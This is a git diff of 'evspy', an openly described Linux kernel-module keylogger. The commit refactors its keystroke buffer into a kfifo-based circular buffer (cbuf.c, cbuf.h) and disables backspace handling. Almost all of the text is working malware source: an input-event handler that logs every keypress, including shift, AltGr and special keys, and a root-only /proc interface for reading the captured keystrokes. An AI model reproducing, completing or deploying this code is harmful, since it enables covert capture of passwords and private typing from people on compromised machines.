diff options
| -rw-r--r-- | Makefile | 2 | ||||
| -rw-r--r-- | cbuf.c | 55 | ||||
| -rw-r--r-- | cbuf.h | 36 | ||||
| -rw-r--r-- | evspy-core.c | 62 | ||||
| -rw-r--r-- | evspy-core.h | 59 | 
5 files changed, 112 insertions, 102 deletions
| @@ -1,5 +1,5 @@  obj-m += evspy.o -evspy-objs := kmap/kmap.o evspy-core.o +evspy-objs := kmap/kmap.o evspy-core.o cbuf.o  all:  	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules @@ -0,0 +1,55 @@ +/* + *   evspy - event based keylogger (Linux module) + * + *   Copyright (c) 2011 Guillermo Ramos <0xwille@gmail.com> + *   based on evbug module by Vojtech Pavlik ((c) 1999-2001) + * + * This file is part of evspy + * + * evspy is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * evspy is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with evspy.  If not, see <http://www.gnu.org/licenses/>. + */ + +#include <linux/kfifo.h> +#include "cbuf.h" + +DECLARE_KFIFO(cbuffer, char, CBUF_SIZE); + +void cbuf_init(void) +{ +	INIT_KFIFO(cbuffer); +} + +int cbuf_read(char *to, int count, int *eof) +{ +	int tmp = kfifo_len(&cbuffer); +	unsigned int n = min(tmp, count);	// TODO n = count? + +	n = kfifo_out(&cbuffer, to, n); + +	if (kfifo_is_empty(&cbuffer)) +		*eof = 1; + +	return n; +} + +void cbuf_write(char c) +{ +	/* +	 * The kfifo implementation doesn't allow to write in a full buffer, so if +	 * we want to do it anyway, we must first delete the last element +	 */ +	if (kfifo_is_full(&cbuffer)) +		kfifo_skip(&cbuffer); +	kfifo_put(&cbuffer, &c); +} @@ -0,0 +1,36 @@ +/* + *   evspy - event based keylogger (Linux module) + * + *   Copyright (c) 2011 Guillermo Ramos <0xwille@gmail.com> + *   based on evbug module by Vojtech Pavlik ((c) 1999-2001) + * + * This file is part of evspy + * + * evspy is free software: you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation, either version 3 of the License, or + * (at your option) any later version. + * + * evspy is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with evspy.  If not, see <http://www.gnu.org/licenses/>. + */ + +#ifndef _EVS_CBUF_H +#define _EVS_CBUF_H + + +#include <asm/page.h> + +#define CBUF_SIZE		PAGE_SIZE			// size of the circular buffer (4K) + +void cbuf_init(void); +int cbuf_read(char *to, int count, int *eof); +void cbuf_write(char c); + + +#endif		/* _EVS_CBUF_H */ diff --git a/evspy-core.c b/evspy-core.c index b33fd27..58625a2 100644 --- a/evspy-core.c +++ b/evspy-core.c @@ -21,14 +21,11 @@   */  #include "evspy-core.h" +#include "cbuf.h" -static char *buffer;		// circular buffer -static char *rdp;			// read pointer -static char *wrp;			// write pointer  static unsigned short int capslock_on = 0;  static unsigned short int shift_on = 0; -  #ifdef EVS_ALTGR_ENABLED  static unsigned short int altgr_on = 0;  #endif @@ -39,10 +36,7 @@ static unsigned short int altgr_on = 0;  static int evspy_read_proc(char *page, char **start, off_t offset, int count,  		int *eof, void *data)  { -	int n, toend; -	int retval = 0; -	int diff = wrp - rdp; - +	int n;  	// root only plz  	if (current_uid() || current_euid()) {  #if EVS_TROLL == 1 @@ -55,35 +49,7 @@ static int evspy_read_proc(char *page, char **start, off_t offset, int count,  #endif  	} -	// wrp > rdp: read from rdp to wrp -	if (diff > 0) { -		n = min(diff, count); -		strncpy(page, rdp, n); -		rdp += n; -		retval = n; - -	// rdp > wrp: read from rdp to end of buffer and then from the beginning of -	// the buffer to wrp -	} else if (diff < 0) { -		toend = (buffer + EVS_BUFSIZE) - rdp; -		n = min(toend, count); -		strncpy(page, rdp, n); -		retval = n; - -		if (n < toend) { -			rdp += n; -		} else { -			n = min(wrp - buffer, count - retval); -			strncpy(page + retval, buffer, n); -			retval += n; -			rdp = buffer + n; -		} -	} - -	// wrp == rdp: buffer is empty -	if (rdp == wrp) -		*eof = 1; -	return retval; +	return cbuf_read(page, count, eof);  }  /* @@ -173,7 +139,7 @@ static void special_char(unsigned int code, unsigned int value)  		sp_tag[1] = '-';  	while (*sp_tag) -		evs_insert(*sp_tag++); +		cbuf_write(*sp_tag++);  }  static void evspy_event(struct input_handle *handle, unsigned int type, @@ -183,10 +149,10 @@ static void evspy_event(struct input_handle *handle, unsigned int type,  	if (type != EV_KEY || unlikely(value == EVS_VAL_HOLD)) {  		return; -	// Backspace -	} else if (code == KEY_BACKSPACE && value == EVS_VAL_PRESS) { -		evs_backspace(); -		return; +//	// Backspace +//	} else if (code == KEY_BACKSPACE && value == EVS_VAL_PRESS) { +//		evs_backspace(); +//		return;  	// Special/unknown keys (alt, ctrl, esc, shift, etc)  	} else if (code >= sizeof(map) || (map[code] == '.' && likely(code != KEY_DOT))) { @@ -196,13 +162,13 @@ static void evspy_event(struct input_handle *handle, unsigned int type,  	} else if (value == EVS_VAL_PRESS) {  #ifdef EVS_ALTGR_ENABLED  		if (altgr_on) -			evs_insert(evs_altgr(code)); +			cbuf_write(evs_altgr(code));  		else  #endif  		if (shift_on || capslock_on) -			evs_insert(evs_shift(code)); +			cbuf_write(evs_shift(code));  		else -			evs_insert(map[code]); +			cbuf_write(map[code]);  	}  } @@ -266,15 +232,13 @@ static int __init evspy_init(void)  #ifdef EVS_ALTGR_ENABLED  	init_altgrmap();  #endif -	buffer = kmalloc(EVS_BUFSIZE, GFP_KERNEL); -	rdp = wrp = buffer; -	return !buffer || input_register_handler(&evspy_handler); +	cbuf_init(); +	return input_register_handler(&evspy_handler);  }  static void __exit evspy_exit(void)  {  	input_unregister_handler(&evspy_handler); -	kfree(buffer);  #ifdef EVS_ALTGR_ENABLED  	exit_altgrmap();  #endif diff --git a/evspy-core.h b/evspy-core.h index dfc0b2e..e9727f4 100644 --- a/evspy-core.h +++ b/evspy-core.h @@ -52,61 +52,16 @@  #define is_ascii(c) (map[c] >= 'a' && map[c] <= 'z')  /* - * If pointer is at the end of buffer, put it at the beginning. - * If not, simply add 1 to it. - */ -#define evs_incp(p)		\ -({		\ -	if ((p) == &buffer[EVS_BUFSIZE-1])		\ -		(p) = buffer;		\ -	else		\ -		(p)++;		\ - 	(p);		\ -}) - -/* - * Same as evs_incp but backwards - */ -#define evs_decp(p)		\ -({		\ -	if ((p) == buffer)		\ -		(p) = &buffer[EVS_BUFSIZE-1];		\ -	else		\ -		(p)--;		\ - 	(p);		\ -}) - -/* - * Insert character c where wrp is pointing and move it to the next char. - * If rdp == wrp, increase rdp too. - */ -#define evs_insert(c)		\ -({		\ -	*wrp = (c);		\ -	if (evs_incp(wrp) == rdp)		\ -		evs_incp(rdp);		\ -}) - -/* - * Remove a character from the buffer - */ -#define evs_delete()		\ -({		\ -	if (likely(wrp != rdp))		\ -		evs_decp(wrp);		\ -}) - -/*   * Try to delete the last char inserted. If it is a special key ("[KEY]"),   * insert "[<<]" instead   */ -#define evs_backspace()		\ -({		\ -	if (*(wrp-1) != ']')		\ -		evs_delete();		\ -	else		\ -		special_char(KEY_BACKSPACE, EVS_VAL_PRESS);		\ -}) +//#define evs_backspace()		\ +//({		\ +//	if (*(wrp-1) != ']')		\ +//  +//	else		\ +//		special_char(KEY_BACKSPACE, EVS_VAL_PRESS);		\ +//})  /*   * Is the c event code associated to any of the FX buttons? | 
